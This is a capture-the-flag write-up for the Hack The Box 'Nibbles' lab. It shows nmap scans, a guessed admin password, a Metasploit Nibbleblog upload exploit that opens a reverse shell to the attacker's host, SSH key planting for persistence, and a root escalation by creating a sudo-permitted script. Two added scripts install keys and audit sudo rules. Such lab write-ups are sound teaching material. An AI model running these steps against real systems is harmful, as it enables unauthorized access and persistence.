Nibbles

tags: HTB Easy Linux OSCP

Enumeration

Nmap

To get started, we run a quick scan of all TCP ports to see what is listening.

# nmap -p- -T4 10.10.10.75
Starting Nmap 7.80 ( https://nmap.org ) at 2021-03-14 18:37 CET
Nmap scan report for 10.10.10.75
Host is up (0.094s latency).
Not shown: 65533 closed ports
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http

Nmap done: 1 IP address (1 host up) scanned in 37.53 seconds

Now that we know the open ports, let's scan them in depth.

# nmap -A -Pn -p 22,80 10.10.10.75
Starting Nmap 7.80 ( https://nmap.org ) at 2021-03-14 18:38 CET
Nmap scan report for 10.10.10.75
Host is up (0.094s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 c4:f8:ad:e8:f8:04:77:de:cf:15:0d:63:0a:18:7e:49 (RSA)
|   256 22:8f:b1:97:bf:0f:17:08:fc:7e:2c:8f:e9:77:3a:48 (ECDSA)
|_  256 e6:ac:27:a3:b5:a9:f1:12:3c:34:a5:5d:5b:eb:3d:e9 (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.12 (95%), Linux 3.13 (95%), Linux 3.16 (95%), Linux 3.18 (95%), Linux 3.2 - 4.9 (95%), Linux 3.8 - 3.11 (95%), Linux 4.4 (95%), Linux 4.2 (95%), Linux 4.8 (95%), ASUS RT-N56U WAP (Linux 3.4) (95%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 22/tcp)
HOP RTT      ADDRESS
1   93.73 ms 10.10.14.1
2   93.67 ms 10.10.10.75

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 14.32 seconds

As we can see, there is a web server (Apache 2.4.18) on port 80 and an SSH server (OpenSSH 7.2p2) on the default port 22. Both banners point at Ubuntu 16.04.

Let's explore the website.
The page itself only shows Hello world!, but the page source contains an HTML comment pointing to a nibbleblog directory.

<b>Hello world!</b>

<!-- /nibbleblog/ directory. Nothing interesting here! -->

Nibbleblog

At /nibbleblog/ we find a blog running Nibbleblog, as the Powered by Nibbleblog footer tells us.

A searchsploit query turns up two candidate exploits.

# searchsploit nibbleblog
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
 Exploit Title                                                                                                                                                                                              |  Path
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
Nibbleblog 3 - Multiple SQL Injections                                                                                                                                                                      | php/webapps/35865.txt
Nibbleblog 4.0.3 - Arbitrary File Upload (Metasploit)                                                                                                                                                       | php/remote/38489.rb
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
Shellcodes: No Results
Papers: No Results

The file upload exploit is authenticated: it needs a valid login for the Nibbleblog admin panel. After much searching around the server without success, I tried various passwords for the admin user and managed to log in with the box name, nibbles, as the password. I did not like this point... it is not realistic at all.

Exploitation

It's time to use the file upload vulnerability with Metasploit's multi/http/nibbleblog_file_upload module. It needs the admin credentials found above and the base path of the blog (TARGETURI); the uploaded PHP lands under content/private/plugins/my_image, and the module removes its image.php once the session is up.

msf6 exploit(multi/http/nibbleblog_file_upload) > set USERNAME admin
USERNAME => admin
msf6 exploit(multi/http/nibbleblog_file_upload) > set PASSWORD nibbles
PASSWORD => nibbles
msf6 exploit(multi/http/nibbleblog_file_upload) > set RHOSTS 10.10.10.75
RHOSTS => 10.10.10.75
msf6 exploit(multi/http/nibbleblog_file_upload) > set TARGETURI /nibbleblog/
TARGETURI => /nibbleblog/
msf6 exploit(multi/http/nibbleblog_file_upload) > set LHOST 10.10.14.9
LHOST => 10.10.14.9
msf6 exploit(multi/http/nibbleblog_file_upload) > run

[*] Started reverse TCP handler on 10.10.14.9:4444
[*] Sending stage (39282 bytes) to 10.10.10.75
[*] Meterpreter session 1 opened (10.10.14.9:4444 -> 10.10.10.75:53234) at 2021-03-14 20:54:10 +0100
[+] Deleted image.php

meterpreter > shell
Process 1649 created.
Channel 0 created.
id
uid=1001(nibbler) gid=1001(nibbler) groups=1001(nibbler)
python3 -c "import pty; pty.spawn('/bin/bash')"
nibbler@Nibbles:/var/www/html/nibbleblog/content/private/plugins/my_image$

The web shell runs as nibbler, so the user.txt flag in nibbler's home directory is readable straight away.

nibbler@Nibbles:/var/www/html/nibbleblog/content/private/plugins/my_image$ cat /home/nibbler/user.txt
CENSORED_FLAG

Post exploitation

Let's upgrade to a proper SSH session by dropping our public key into nibbler's authorized_keys. The key is censored below; a real entry must be the complete public key line starting with the key type (ssh-ed25519, ssh-rsa, ...). Note that sshd's StrictModes (on by default) silently ignores the file if the home directory, .ssh or authorized_keys are group- or world-writable, so check the permissions if the login is refused.

nibbler@Nibbles:/home/nibbler$ mkdir .ssh
nibbler@Nibbles:/home/nibbler$ cd .ssh/
nibbler@Nibbles:/home/nibbler/.ssh$ echo "KZwNCA7nI0th*****************5E1wl2EByci0=" > authorized_keys
nibbler@Nibbles:/home/nibbler/.ssh$
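As an added example (not part of the original writeup), the helper below does the key install step properly: it refuses an incomplete or mismatched key line, sets the permissions that sshd's StrictModes checks, and does not append the same key twice. The sample key it builds is a constructed ed25519 blob with no private half, only there so the demo runs offline; the script assumes GNU coreutils (base64 -d, head -c).

```bash
#!/bin/sh
# Added example, not code from the original writeup: install a public key the
# way sshd expects it, so the "upgrade to SSH" step does not fail silently.
# Assumes GNU coreutils (base64 -d, head -c); nothing here touches the network.

# valid_pubkey_line "ssh-ed25519 AAAA... comment" -> 0 if the entry is usable:
# a known key type and a base64 blob whose decoded wire format names that type.
valid_pubkey_line() {
    line=$1
    type=${line%% *}                     # first field: key type
    rest=${line#* }
    blob=${rest%% *}                     # second field: base64 key blob
    case $type in
        ssh-ed25519|ssh-rsa|ecdsa-sha2-nistp256|ecdsa-sha2-nistp384|ecdsa-sha2-nistp521) ;;
        *) return 1 ;;
    esac
    [ "$blob" != "$line" ] || return 1   # no second field at all
    # the decoded blob starts with a length-prefixed copy of the key type
    printf '%s' "$blob" | base64 -d 2>/dev/null | grep -a -q "$type"
}

# install_authorized_key HOME_DIR "ssh-ed25519 AAAA... comment" -> 0 on success
install_authorized_key() {
    home=$1
    key=$2
    if ! valid_pubkey_line "$key"; then
        echo "refusing malformed key line: ${key%% *}..." >&2
        return 1
    fi
    mkdir -p "$home/.ssh"
    chmod 700 "$home/.ssh"               # StrictModes rejects group/world-writable dirs
    touch "$home/.ssh/authorized_keys"
    chmod 600 "$home/.ssh/authorized_keys"
    # append only if not already present, so re-running does not stack duplicates
    if ! grep -qxF "$key" "$home/.ssh/authorized_keys"; then
        printf '%s\n' "$key" >> "$home/.ssh/authorized_keys"
    fi
}

# sample_ed25519_pubkey: a constructed, syntactically valid ed25519 blob
# (4-byte length + "ssh-ed25519", 4-byte length + 32 zero bytes). It has no
# private half and exists only so the demo runs offline.
sample_ed25519_pubkey() {
    { printf '\000\000\000\013ssh-ed25519\000\000\000\040'; head -c 32 /dev/zero; } \
        | base64 | tr -d '\n'
}

# Demo: install the constructed key into a scratch home directory.
demo_home=$(mktemp -d)
install_authorized_key "$demo_home" "ssh-ed25519 $(sample_ed25519_pubkey) added-example" \
    && echo "installed into $demo_home/.ssh/authorized_keys"
```

Point it at the real home directory with the real ssh-keygen output line. The StrictModes check is the one that bites in practice: a loose mode on ~/.ssh or authorized_keys makes sshd ignore the file, and the only symptom on the client side is the usual Permission denied (publickey).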

Enumeration

Sudo

nibbler@Nibbles:/var/www/html/nibbleblog/content/private/plugins/my_image$ sudo -l
sudo: unable to resolve host Nibbles: Connection timed out
Matching Defaults entries for nibbler on Nibbles:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User nibbler may run the following commands on Nibbles:
    (root) NOPASSWD: /home/nibbler/personal/stuff/monitor.sh

So nibbler can run /home/nibbler/personal/stuff/monitor.sh as root without a password. The dangerous part is not the NOPASSWD tag but the path: it sits inside nibbler's own home directory and does not even exist yet, so we can create it with whatever content we like and sudo will happily run it as root. (The "unable to resolve host" line is only sudo complaining that the hostname has no /etc/hosts entry; it can be ignored.)
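The following script is an added example, not part of the original writeup, that turns that observation into a check. It parses the text sudo -l prints and classifies each command path for a given uid as creatable (the monitor.sh case), writable, replaceable, missing or ok, using ownership and mode bits rather than test -w so the verdict is the same whether it runs as the target user or as root on that user's behalf. It assumes GNU coreutils (stat -c); the rule text in the demo at the bottom is constructed to mirror the sudo -l output above.

```bash
#!/bin/sh
# Added example, not code from the original writeup: audit the rules that
# `sudo -l` prints for the weakness exploited on this box, a command path the
# invoking user can create or replace. Assumes GNU coreutils (stat -c).

# last_octal_digit MODE -> the "other" permission digit of e.g. 755 or 1777
last_octal_digit() { m=$1; printf '%s\n' "${m#"${m%?}"}"; }

# owned_or_world_writable PATH UID -> 0 if UID owns PATH or others may write it
owned_or_world_writable() {
    owner=$(stat -c %u "$1" 2>/dev/null) || return 1
    if [ "$owner" = "$2" ]; then return 0; fi
    other=$(last_octal_digit "$(stat -c %a "$1")")
    [ $(( other & 2 )) -ne 0 ]
}

# is_sticky DIR -> 0 if the sticky bit is set (others cannot replace files there)
is_sticky() {
    mode=$(stat -c %a "$1")
    [ ${#mode} -eq 4 ] && [ $(( ${mode%???} & 1 )) -ne 0 ]
}

# classify_sudo_target PATH UID -> one word:
#   any         the rule grants ALL commands
#   creatable   PATH is missing and UID can create it (monitor.sh above)
#   missing     PATH is missing and UID cannot create it
#   writable    PATH exists and UID can modify it
#   replaceable PATH exists in a directory UID can write to (no sticky bit)
#   ok          nothing obviously wrong
classify_sudo_target() {
    path=$1 uid=$2
    if [ "$path" = ALL ]; then echo any; return 0; fi
    if [ ! -e "$path" ]; then
        anc=$path                        # walk up to the nearest existing ancestor
        while [ ! -e "$anc" ] && [ "$anc" != / ]; do anc=$(dirname "$anc"); done
        if owned_or_world_writable "$anc" "$uid"; then echo creatable; else echo missing; fi
        return 0
    fi
    if owned_or_world_writable "$path" "$uid"; then echo writable; return 0; fi
    dir=$(dirname "$path")
    if owned_or_world_writable "$dir" "$uid" && ! is_sticky "$dir"; then
        echo replaceable; return 0
    fi
    echo ok
}

# audit_sudo_rules UID < "sudo -l output" -> prints "<verdict> <path>" for each
# flagged command; returns 1 if anything was flagged, 0 otherwise
audit_sudo_rules() {
    uid=$1 flagged=0
    while IFS= read -r line; do
        case $line in *')'*) ;; *) continue ;; esac   # only "(runas) ... cmd" lines
        cmds=${line#*)}                                 # drop the "(root)" part
        saved=$IFS; IFS=,; set -- $cmds; IFS=$saved     # one entry per comma-separated command
        for part in "$@"; do
            for tok in $part; do
                case $tok in /*|ALL) ;; *) continue ;; esac   # skip NOPASSWD:, SETENV: ...
                verdict=$(classify_sudo_target "$tok" "$uid")
                if [ "$verdict" != ok ]; then
                    printf '%s %s\n' "$verdict" "$tok"; flagged=1
                fi
                break                                     # arguments after the command are not checked
            done
        done
    done
    return $flagged
}

# Demo with a constructed rule list in a scratch directory (no sudo needed):
demo=$(mktemp -d); mkdir -p "$demo/personal"; chmod 777 "$demo/personal"
printf '%s\n' "User nibbler may run the following commands on Nibbles:" \
    "    (root) NOPASSWD: $demo/personal/stuff/monitor.sh" \
    | audit_sudo_rules "$(id -u)" || echo "-> at least one sudo rule is exploitable"
```

On a real host, feed it `sudo -l` directly: sudo -l | sh audit.sh "$(id -u)" (assuming the functions are saved in audit.sh with that last demo block replaced by a call to audit_sudo_rules). The sticky-bit special case matters because a world-writable /tmp does not let another user replace a root-owned file there, while a plain 777 directory does.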

Privilege escalation

nibbler@Nibbles:~$ mkdir -p personal/stuff
nibbler@Nibbles:~$ cd personal/stuff/
nibbler@Nibbles:~/personal/stuff$ echo "/bin/bash -i" > monitor.sh
nibbler@Nibbles:~/personal/stuff$ chmod +x monitor.sh
nibbler@Nibbles:~/personal/stuff$ sudo /home/nibbler/personal/stuff/monitor.sh
sudo: unable to resolve host Nibbles: Connection timed out
root@Nibbles:~/personal/stuff# id
uid=0(root) gid=0(root) groups=0(root)
root@Nibbles:~/personal/stuff# cat /root/root.txt
CENSORED_FLAG

And that's all folks!